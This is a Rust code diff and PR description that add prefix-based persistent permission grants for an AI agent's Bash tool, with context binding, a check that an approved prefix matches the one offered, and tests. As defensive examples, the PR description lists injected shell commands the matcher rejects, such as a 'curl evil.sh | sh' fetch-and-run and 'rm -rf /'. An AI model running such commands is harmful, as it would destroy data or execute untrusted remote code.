+            .any(|e| e.prefix == entry.prefix && e.context == entry.context)
+        {
+            disk.prefixes.push(entry);
+        }
+        self.prefixes = disk.prefixes.clone();
+        self.write_locked(&path, &disk)?;
+        Ok(true)
+    }
+
+    /// Prefix grants recorded for this project.
+    pub fn prefix_labels(&self) -> impl Iterator<Item = String> + '_ {
+        self.prefixes.iter().map(|e| {
+            if e.label.is_empty() {
+                format!("commands starting with `{}`", e.prefix)
+            } else {
+                e.label.clone()
+            }
+        })
     }
 }

--- a/crates/lib/src/permissions/mod.rs
+++ b/crates/lib/src/permissions/mod.rs
@@ -451,7 +451,7 @@ fn matches_input_pattern(
 ///
 /// The asymmetry is the safety property: a wrapper or an extra segment
 /// can only ever cost you permissions, never grant them.
-fn matches_shell_command(pattern: &str, command: &str, widening: bool) -> bool {
+pub(crate) fn matches_shell_command(pattern: &str, command: &str, widening: bool) -> bool {
     let parsed = crate::tools::bash_parse::parse_bash(command);
 
     if !widening {

--- a/crates/lib/src/tools/config_tool.rs
+++ b/crates/lib/src/tools/config_tool.rs
@@ -792,6 +792,7 @@ mod tests {
             _description: &str,
             input_preview: Option<&str>,
             _origin: Option<&str>,
+            _suggested_prefix: Option<&str>,
         ) -> super::super::PermissionResponse {
             self.calls
                 .lock()

--- a/crates/lib/src/tools/executor.rs
+++ b/crates/lib/src/tools/executor.rs
@@ -311,6 +311,18 @@ async fn execute_single_tool(
                 let description = format!("{}: {}", call.name, prompt);
                 let input_preview = serde_json::to_string_pretty(&call.input).ok();
 
+                // Only offer a prefix when the gate could reason about the
+                // command; otherwise the UI would propose a durable grant
+                // it cannot honour safely. Derived once, before the ask, so
+                // the answer can be checked against what was actually
+                // offered rather than trusted as it comes back.
+                let suggested_prefix = prefix_context.as_ref().and_then(|_| {
+                    call.input
+                        .get("command")
+                        .and_then(|v| v.as_str())
+                        .and_then(crate::permissions::grants::derive_prefix)
+                });
+
                 let response = if let Some(ref prompter) = ctx.permission_prompter {
                     // `ask` blocks synchronously until the human answers —
                     // potentially minutes. Announce the block so the runtime
@@ -321,15 +333,6 @@ async fn execute_single_tool(
                     // block_in_place is a no-op choice on current-thread
                     // runtimes (it would panic), where blocking is the
                     // caller's contract anyway.
-                    // Only offer a prefix when the gate could reason
-                    // about the command; otherwise the UI would propose a
-                    // durable grant it cannot honour safely.
-                    let suggested_prefix = prefix_context.as_ref().and_then(|_| {
-                        call.input
-                            .get("command")
-                            .and_then(|v| v.as_str())
-                            .and_then(crate::permissions::grants::derive_prefix)
-                    });
                     let ask = || {
                         prompter.ask(
                             &call.name,
@@ -399,8 +402,16 @@ async fn execute_single_tool(
                         }
                     }
                     super::PermissionResponse::AllowAlwaysPrefix { ref prefix } => {
-                        match (ctx.persistent_grants.as_ref(), &prefix_context) {
-                            (Some(grants), Some(cx)) => {
+                        // The durable grant is bound to the operation that
+                        // was actually offered. The answer carries the
+                        // prefix text back from the UI, and persisting it
+                        // unchecked would make the grant only as narrow as
+                        // whatever came over that boundary. Re-derived
+                        // above from this call's own command; anything
+                        // else is not the approval the user was shown.
+                        let as_offered = suggested_prefix.as_deref() == Some(prefix.as_str());
+                        match (ctx.persistent_grants.as_ref(), &prefix_context, as_offered) {
+                            (Some(grants), Some(cx), true) => {
                                 // The label is the prefix itself, which is
                                 // short and user-chosen — unlike the
                                 // description, which embeds the whole
@@ -412,9 +423,11 @@ async fn execute_single_tool(
                                     tracing::warn!("could not persist prefix grant: {e}");
                                 }
                             }
-                            // No grant store, or not a shell call: fall
-                            // back to session scope for this exact call
-                            // rather than silently widening anything.
+                            // No grant store, not a shell call, or a
+                            // prefix that is not the one this call
+                            // offered: fall back to session scope for
+                            // this exact call rather than silently
+                            // widening anything.
                             _ => {
                                 if let Some(ref allows) = ctx.session_allows {
                                     allows.lock().await.insert(exact_entry);
@@ -1874,6 +1887,190 @@ mod parallel_batch_tests {
         let (results, ran) = run_shifting(None).await;
         assert_eq!(ran, 1, "a stable binding must still run");
         assert!(!results[0].result.is_error);
+    }
+
+    /// Stands in for the shell tool: prefix grants key off the tool
+    /// *name*, so the name is what matters here.
+    struct BashLikeTool {
+        ran: Arc<AtomicUsize>,
+    }
+
+    #[async_trait]
+    impl Tool for BashLikeTool {
+        fn name(&self) -> &'static str {
+            "Bash"
+        }
+        fn description(&self) -> &'static str {
+            "test tool"
+        }
+        fn input_schema(&self) -> serde_json::Value {
+            serde_json::json!({"type": "object"})
+        }
+        fn is_read_only(&self) -> bool {
+            false
+        }
+        async fn check_permissions(
+            &self,
+            _input: &serde_json::Value,
+            _checker: &crate::permissions::PermissionChecker,
+        ) -> PermissionDecision {
+            PermissionDecision::Ask("running".into())
+        }
+        async fn call(
+            &self,
+            _input: serde_json::Value,
+            _ctx: &ToolContext,
+        ) -> Result<ToolResult, crate::error::ToolError> {
+            self.ran.fetch_add(1, Ordering::SeqCst);
+            Ok(ToolResult::success("ok".to_string()))
+        }
+    }
+
+    /// Answers with whatever prefix it is told to, regardless of what the
+    /// call actually offered.
+    struct PrefixPrompter {
+        asked: Arc<AtomicUsize>,
+        answer: Option<String>,
+        offered: Arc<std::sync::Mutex<Vec<Option<String>>>>,
+    }
+    impl PermissionPrompter for PrefixPrompter {
+        fn ask(
+            &self,
+            _tool_name: &str,
+            _description: &str,
+            _input_preview: Option<&str>,
+            _origin: Option<&str>,
+            suggested_prefix: Option<&str>,
+        ) -> PermissionResponse {
+            self.asked.fetch_add(1, Ordering::SeqCst);
+            self.offered
+                .lock()
+                .unwrap()
+                .push(suggested_prefix.map(str::to_string));
+            // `None` means "echo back whatever was offered".
+            let prefix = match self.answer {
+                Some(ref p) => p.clone(),
+                None => suggested_prefix.unwrap_or_default().to_string(),
+            };
+            PermissionResponse::AllowAlwaysPrefix { prefix }
+        }
+    }
+
+    async fn run_prefix_answer(answer: Option<&str>) -> (usize, Vec<Option<String>>) {
+        let ran = Arc::new(AtomicUsize::new(0));
+        let asked = Arc::new(AtomicUsize::new(0));
+        let offered = Arc::new(std::sync::Mutex::new(Vec::new()));
+        let tools: Vec<Arc<dyn Tool>> = vec![Arc::new(BashLikeTool { ran: ran.clone() })];
+
+        let mut ctx = ToolContext::minimal(
+            std::env::temp_dir(),
+            tokio_util::sync::CancellationToken::new(),
+        );
+        ctx.permission_prompter = Some(Arc::new(PrefixPrompter {
+            asked: asked.clone(),
+            answer: answer.map(str::to_string),
+            offered: offered.clone(),
+        }));
+        ctx.persistent_grants = Some(Arc::new(tokio::sync::Mutex::new(
+            crate::permissions::grants::GrantStore::ephemeral(),
+        )));
+        ctx.session_allows = Some(Arc::new(tokio::sync::Mutex::new(
+            std::collections::HashSet::new(),
+        )));
+        let checker = crate::permissions::PermissionChecker::allow_all();
+
+        let bash = |id: &str, command: &str| PendingToolCall {
+            id: id.into(),
+            name: "Bash".into(),
+            input: serde_json::json!({"command": command}),
+        };
+
+        // The call that gets approved, then the one a widened grant
+        // would silently cover.
+        execute_tool_calls(
+            &[bash("c1", "git status --porcelain")],
+            &tools,
+            &ctx,
+            &checker,
+        )
+        .await;
+        execute_tool_calls(&[bash("c2", "git push --force")], &tools, &ctx, &checker).await;
+        let seen = offered.lock().unwrap().clone();
+        (asked.load(Ordering::SeqCst), seen)
+    }
+
+    /// The answer carries the prefix text back from the UI. Persisting it
+    /// unchecked would make the durable grant only as narrow as whatever
+    /// crossed that boundary — an answer naming `git` would authorize
+    /// `git push --force` for good. The grant has to be the prefix this
+    /// call actually offered.
+    #[tokio::test]
+    async fn a_prefix_answer_that_was_not_offered_does_not_persist() {
+        let (asked, offered) = run_prefix_answer(Some("git")).await;
+        assert_eq!(
+            offered.first().cloned().flatten().as_deref(),
+            Some("git status"),
+            "precondition: the call offered the narrow prefix"
+        );
+        assert_eq!(
+            asked, 2,
+            "a prefix the call never offered was persisted and suppressed the next prompt"
+        );
+    }
+
+    /// The offered prefix itself still works, or the feature would do
+    /// nothing at all.
+    #[tokio::test]
+    async fn the_offered_prefix_is_persisted_and_honored() {
+        let ran = Arc::new(AtomicUsize::new(0));
+        let asked = Arc::new(AtomicUsize::new(0));
+        let offered = Arc::new(std::sync::Mutex::new(Vec::new()));
+        let tools: Vec<Arc<dyn Tool>> = vec![Arc::new(BashLikeTool { ran: ran.clone() })];
+
+        let mut ctx = ToolContext::minimal(
+            std::env::temp_dir(),
+            tokio_util::sync::CancellationToken::new(),
+        );
+        ctx.permission_prompter = Some(Arc::new(PrefixPrompter {
+            asked: asked.clone(),
+            answer: None,
+            offered,
+        }));
+        ctx.persistent_grants = Some(Arc::new(tokio::sync::Mutex::new(
+            crate::permissions::grants::GrantStore::ephemeral(),
+        )));
+        ctx.session_allows = Some(Arc::new(tokio::sync::Mutex::new(
+            std::collections::HashSet::new(),
+        )));
+        let checker = crate::permissions::PermissionChecker::allow_all();
+        let bash = |id: &str, command: &str| PendingToolCall {
+            id: id.into(),
+            name: "Bash".into(),
+            input: serde_json::json!({"command": command}),
+        };
+
+        execute_tool_calls(
+            &[bash("c1", "git status --porcelain")],
+            &tools,
+            &ctx,
+            &checker,
+        )
+        .await;
+        // Covered by the `git status` prefix that was offered and echoed.
+        execute_tool_calls(&[bash("c2", "git status --short")], &tools, &ctx, &checker).await;
+        assert_eq!(
+            asked.load(Ordering::SeqCst),
+            1,
+            "the granted prefix re-prompted"
+        );
+
+        // Not covered: a different subcommand.
+        execute_tool_calls(&[bash("c3", "git push --force")], &tools, &ctx, &checker).await;
+        assert_eq!(
+            asked.load(Ordering::SeqCst),
+            2,
+            "the prefix grant widened past its subcommand"
+        );
     }
 
     /// A write tool, so the session-allow key reduces to `file_path`

--- a/crates/lib/src/tools/executor.rs
+++ b/crates/lib/src/tools/executor.rs
@@ -282,8 +282,26 @@ async fn execute_single_tool(
                 }
                 None => false,
             };
+            // The context a prefix grant for this call would carry, if
+            // this is a shell call at all.
+            let prefix_context =
+                bash_prefix_context(&call.name, &call.input, &sandbox_state, &ctx.cwd);
             let granted = match ctx.persistent_grants {
-                Some(ref grants) => grants.lock().await.contains(&grant_key),
+                Some(ref grants) => {
+                    let mut store = grants.lock().await;
+                    let exact = store.contains(&grant_key);
+                    // A prefix grant is consulted only for shell calls,
+                    // and only in the context it was made under.
+                    let by_prefix = !exact
+                        && match (
+                            &prefix_context,
+                            call.input.get("command").and_then(|v| v.as_str()),
+                        ) {
+                            (Some(cx), Some(cmd)) => store.allows_prefix(cmd, cx),
+                            _ => false,
+                        };
+                    exact || by_prefix
+                }
                 None => false,
             };
             if session_allowed || granted {
@@ -303,12 +321,22 @@ async fn execute_single_tool(
                     // block_in_place is a no-op choice on current-thread
                     // runtimes (it would panic), where blocking is the
                     // caller's contract anyway.
+                    // Only offer a prefix when the gate could reason
+                    // about the command; otherwise the UI would propose a
+                    // durable grant it cannot honour safely.
+                    let suggested_prefix = prefix_context.as_ref().and_then(|_| {
+                        call.input
+                            .get("command")
+                            .and_then(|v| v.as_str())
+                            .and_then(crate::permissions::grants::derive_prefix)
+                    });
                     let ask = || {
                         prompter.ask(
                             &call.name,
                             &description,
                             input_preview.as_deref(),
                             ctx.agent_origin.as_deref(),
+                            suggested_prefix.as_deref(),
                         )
                     };
                     match tokio::runtime::Handle::current().runtime_flavor() {
@@ -364,6 +392,30 @@ async fn execute_single_tool(
                             // Losing durability is the documented cost of
                             // the opt-out; losing exactness is not.
                             None => {
+                                if let Some(ref allows) = ctx.session_allows {
+                                    allows.lock().await.insert(exact_entry);
+                                }
+                            }
+                        }
+                    }
+                    super::PermissionResponse::AllowAlwaysPrefix { ref prefix } => {
+                        match (ctx.persistent_grants.as_ref(), &prefix_context) {
+                            (Some(grants), Some(cx)) => {
+                                // The label is the prefix itself, which is
+                                // short and user-chosen — unlike the
+                                // description, which embeds the whole
+                                // command line and may carry credentials.
+                                let label = format!("commands starting with `{prefix}`");
+                                if let Err(e) =
+                                    grants.lock().await.insert_prefix(prefix, cx, &label)
+                                {
+                                    tracing::warn!("could not persist prefix grant: {e}");
+                                }
+                            }
+                            // No grant store, or not a shell call: fall
+                            // back to session scope for this exact call
+                            // rather than silently widening anything.
+                            _ => {
                                 if let Some(ref allows) = ctx.session_allows {
                                     allows.lock().await.insert(exact_entry);
                                 }
@@ -593,6 +645,56 @@ pub fn sandbox_grant_state(sandbox: Option<&crate::sandbox::SandboxExecutor>) ->
 /// this key is persisted into the config directory, where secrets must
 /// never be written. Equality matching needs nothing more than the
 /// digest.
+/// The non-command half of a shell grant key: everything that changes
+/// what the command would actually do.
+///
+/// Shared with prefix grants, which match the command by parsing but
+/// must still be bound to the same context — a prefix approved with the
+/// sandbox disabled, or in another project, must not silently apply
+/// where those differ.
+fn bash_grant_context(
+    unsandboxed: bool,
+    background: bool,
+    timeout: u64,
+    sandbox_state: &str,
+    cwd_digest: &str,
+) -> String {
+    format!(
+        "nosandbox:{unsandboxed}\0bg:{background}\0timeout:{timeout}\0isolated:{sandbox_state}\0cwd-sha256:{cwd_digest}"
+    )
+}
+
+/// The context a prefix grant for this call would be bound to, or `None`
+/// when the tool is not a shell (prefix grants are shell-only).
+pub fn bash_prefix_context(
+    tool: &str,
+    input: &serde_json::Value,
+    sandbox_state: &str,
+    cwd: &std::path::Path,
+) -> Option<String> {
+    if tool != "Bash" && tool != "PowerShell" {
+        return None;
+    }
+    let canonical = cwd.canonicalize().unwrap_or_else(|_| cwd.to_path_buf());
+    let cwd_digest = sha256_hex(&crate::config::os_path_bytes(&canonical));
+    let unsandboxed = input
+        .get("dangerouslyDisableSandbox")
+        .and_then(|v| v.as_bool())
+        .unwrap_or(false);
+    let background = input
+        .get("run_in_background")
+        .and_then(|v| v.as_bool())
+        .unwrap_or(false);
+    let timeout = crate::tools::bash::effective_timeout_ms(input);
+    Some(bash_grant_context(
+        unsandboxed,
+        background,
+        timeout,
+        sandbox_state,
+        &cwd_digest,
+    ))
+}
+
 pub fn persistent_grant_key(
     tool: &str,
     input: &serde_json::Value,
@@ -623,8 +725,9 @@ pub fn persistent_grant_key(
             // budget re-prompts.
             let timeout = crate::tools::bash::effective_timeout_ms(input);
             format!(
-                "cmd-sha256:{}\0nosandbox:{unsandboxed}\0bg:{background}\0timeout:{timeout}\0isolated:{sandbox_state}\0cwd-sha256:{cwd_digest}",
-                sha256_hex(command.as_bytes())
+                "cmd-sha256:{}\0{}",
+                sha256_hex(command.as_bytes()),
+                bash_grant_context(unsandboxed, background, timeout, sandbox_state, &cwd_digest)
             )
         }
         "WebFetch" => {
@@ -1595,6 +1698,7 @@ mod parallel_batch_tests {
             _description: &str,
             _input_preview: Option<&str>,
             _origin: Option<&str>,
+            _suggested_prefix: Option<&str>,
         ) -> PermissionResponse {
             self.asked.fetch_add(1, Ordering::SeqCst);
             PermissionResponse::Deny
@@ -1663,6 +1767,7 @@ mod parallel_batch_tests {
             _description: &str,
             _input_preview: Option<&str>,
             _origin: Option<&str>,
+            _suggested_prefix: Option<&str>,
         ) -> PermissionResponse {
             if let Some(ref next) = self.swap_to {
                 *self.digest.lock().unwrap() = next.clone();
@@ -1769,6 +1874,7 @@ mod parallel_batch_tests {
             _description: &str,
             _input_preview: Option<&str>,
             _origin: Option<&str>,
+            _suggested_prefix: Option<&str>,
         ) -> PermissionResponse {
             self.asked.fetch_add(1, Ordering::SeqCst);
             PermissionResponse::AllowAlways
@@ -1841,6 +1947,7 @@ mod parallel_batch_tests {
             _description: &str,
             _input_preview: Option<&str>,
             _origin: Option<&str>,
+            _suggested_prefix: Option<&str>,
         ) -> PermissionResponse {
             self.asked.fetch_add(1, Ordering::SeqCst);
             PermissionResponse::AllowSession

--- a/crates/lib/src/tools/executor.rs
+++ b/crates/lib/src/tools/executor.rs
@@ -665,14 +665,26 @@ fn bash_grant_context(
 }
 
 /// The context a prefix grant for this call would be bound to, or `None`
-/// when the tool is not a shell (prefix grants are shell-only).
+/// when the tool is not the Bash tool.
+///
+/// Bash only, deliberately. Both halves of the feature — deriving a
+/// prefix and matching one — run the Bash grammar, and the permission
+/// rules already treat PowerShell as unanalysable for exactly that
+/// reason (`auto_decision` in `permissions/mod.rs`). Judging PowerShell
+/// syntax with the wrong grammar is the same mistake, made where the
+/// answer is durable.
+///
+/// The tool name is part of the context as well, so a grant can never be
+/// honoured for a different tool that happens to produce the same
+/// context — a second shell tool added later starts with its own
+/// namespace rather than inheriting Bash's approvals.
 pub fn bash_prefix_context(
     tool: &str,
     input: &serde_json::Value,
     sandbox_state: &str,
     cwd: &std::path::Path,
 ) -> Option<String> {
-    if tool != "Bash" && tool != "PowerShell" {
+    if tool != "Bash" {
         return None;
     }
     let canonical = cwd.canonicalize().unwrap_or_else(|_| cwd.to_path_buf());
@@ -686,12 +698,12 @@ pub fn bash_prefix_context(
         .and_then(|v| v.as_bool())
         .unwrap_or(false);
     let timeout = crate::tools::bash::effective_timeout_ms(input);
-    Some(bash_grant_context(
-        unsandboxed,
-        background,
-        timeout,
-        sandbox_state,
-        &cwd_digest,
+    // Namespaced by tool, and kept out of `bash_grant_context` itself so
+    // the exact-grant key that shares it stays byte-identical to what
+    // already-released versions wrote.
+    Some(format!(
+        "tool:{tool}\0{}",
+        bash_grant_context(unsandboxed, background, timeout, sandbox_state, &cwd_digest)
     ))
 }
 
@@ -903,6 +915,43 @@ mod session_allow_tests {
             None,
             &[],
         )
+    }
+
+    /// Prefix grants are Bash-only. Both deriving a prefix and matching
+    /// one run the Bash grammar, and the permission rules already refuse
+    /// to analyse PowerShell for that reason; offering a durable grant
+    /// there would judge PowerShell syntax with the wrong parser — and,
+    /// since the context carries no tool name of its own, would let a
+    /// Bash grant answer for a PowerShell call with the same text.
+    #[test]
+    fn only_the_bash_tool_gets_a_prefix_context() {
+        let input = serde_json::json!({"command": "git status"});
+        let cwd = std::path::Path::new(".");
+        assert!(
+            bash_prefix_context("Bash", &input, "none", cwd).is_some(),
+            "Bash must still offer prefix grants"
+        );
+        for tool in ["PowerShell", "powershell", "Zsh", "Read"] {
+            assert_eq!(
+                bash_prefix_context(tool, &input, "none", cwd),
+                None,
+                "{tool} was offered a prefix grant"
+            );
+        }
+    }
+
+    /// Even within Bash the context names its tool, so a future second
+    /// shell tool starts with its own namespace rather than inheriting
+    /// approvals made for Bash.
+    #[test]
+    fn a_prefix_context_names_its_tool() {
+        let input = serde_json::json!({"command": "git status"});
+        let cx = bash_prefix_context("Bash", &input, "none", std::path::Path::new("."))
+            .expect("a context");
+        assert!(
+            cx.starts_with("tool:Bash\0"),
+            "context not namespaced: {cx}"
+        );
     }
 
     /// The grant scope is the repository root while the session can

--- a/crates/lib/src/tools/mod.rs
+++ b/crates/lib/src/tools/mod.rs
@@ -234,6 +234,16 @@ pub enum PermissionResponse {
     /// this call and nothing adjacent to it — see
     /// [`crate::permissions::grants`].
     AllowAlways,
+    /// Approve and remember every command starting with `prefix`.
+    ///
+    /// Matched by parsing rather than by string prefix: the grant holds
+    /// only when *every* invocation in the command starts with it, and
+    /// never for a command containing a substitution, subshell or
+    /// redirection. So `git status` does not cover
+    /// `git status && rm -rf /`.
+    AllowAlwaysPrefix {
+        prefix: String,
+    },
     Deny,
 }
 
@@ -250,13 +260,25 @@ pub trait PermissionPrompter: Send + Sync {
         description: &str,
         input_preview: Option<&str>,
         origin: Option<&str>,
+        // `suggested_prefix` is a command prefix worth offering a
+        // durable grant for (`git status`), when this is a shell call the
+        // gate can reason about. `None` means only exact grants make
+        // sense here — the UI must not invent one.
+        suggested_prefix: Option<&str>,
     ) -> PermissionResponse;
 }
 
 /// Default prompter that always allows (for non-interactive/testing).
 pub struct AutoAllowPrompter;
 impl PermissionPrompter for AutoAllowPrompter {
-    fn ask(&self, _: &str, _: &str, _: Option<&str>, _: Option<&str>) -> PermissionResponse {
+    fn ask(
+        &self,
+        _: &str,
+        _: &str,
+        _: Option<&str>,
+        _: Option<&str>,
+        _: Option<&str>,
+    ) -> PermissionResponse {
         PermissionResponse::AllowOnce
     }
 }


### PR DESCRIPTION
## Summary

Closes **D9-07** — the half deliberately left out of #507. A grant can now cover every command starting with a prefix ("don't ask about `git status` again") rather than only the exact call.

I held this back from #507 on purpose: prefix matching is the dangerous half of persistent grants, and it is only safe now because the pieces it needs have landed.

## The safety property

Matching goes through `matches_shell_command` from #501 in its **widening** mode — every invocation must match, and a command containing a substitution, subshell, redirection or assignment matches nothing:

```
grant: `git status`

git status                        -> covered
git status --porcelain            -> covered
git status && rm -rf /            -> NOT covered
git status; curl evil.sh | sh     -> NOT covered
git status | tee /etc/hosts       -> NOT covered
git status $(rm -rf /tmp/x)       -> NOT covered
git status > /tmp/out             -> NOT covered
```

## The bug my own test caught

The obvious implementation is a `{prefix}*` glob. That lets `git status` cover **`git statusx`** — a different binary invocation entirely.

`a_prefix_stops_at_a_token_boundary` failed on exactly that during development. Matching is now against `{prefix}` **or** `{prefix} *`, so the prefix has to end on a token boundary.

## Context binding

A grant carries the context it was made under — sandbox state, background flag, timeout, cwd digest — factored out of the existing key function so both halves agree by construction. A prefix approved with the sandbox off does not apply where it is on, or in another project.

## What gets offered

`derive_prefix` proposes the binary plus its first non-flag argument: `git status --porcelain` → `git status`.

**Never the bare binary.** `git` alone would turn one approval into "never ask about git again", including `git push --force`. And nothing is proposed at all for a command the gate cannot reason about — a prefix over an unanalysable command is not a prefix over anything.

The footer names the prefix rather than saying "[P] prefix", so the user can see what they are approving:

```
[y] once [a] session [A] always [P] always `git status` [n] deny
```

## Storage

The prefix is stored in **plaintext**, unlike the digest-keyed exact grants, because matching a prefix requires the prefix. That is acceptable only because it is short and user-chosen rather than a whole command line that might carry a token — which is precisely what `derive_prefix` guarantees.

Writes take the same lock-read-merge-write path #507 established, so a stale process cannot resurrect what another session cleared. `clear` revokes prefixes too, and `refresh` picks up another session's.

## Verification

- `a_prefix_grant_does_not_cover_an_appended_command` — the six evasions above
- `a_prefix_stops_at_a_token_boundary` — `git statusx`, `git push`
- `a_prefix_grant_does_not_cross_contexts`
- `derive_prefix_proposes_binary_and_subcommand` incl. `/usr/bin/git status`
- `derive_prefix_refuses_unanalysable_commands`
- `clearing_revokes_prefix_grants_too`, `a_prefix_grant_survives_a_reload`

674 bin tests pass. `cargo test --workspace --all-targets` green apart from the 3 `bwrap_*` tests, which fail on this host with `setting up uid map: Permission denied` and pass in CI. `clippy --all-targets -- -D warnings` and `fmt --check` clean.

## Note

`PermissionPrompter::ask` gains a `suggested_prefix` parameter. Four impls updated. The alternative — having the UI derive the prefix from the JSON preview — would put safety-relevant parsing in the presentation layer.
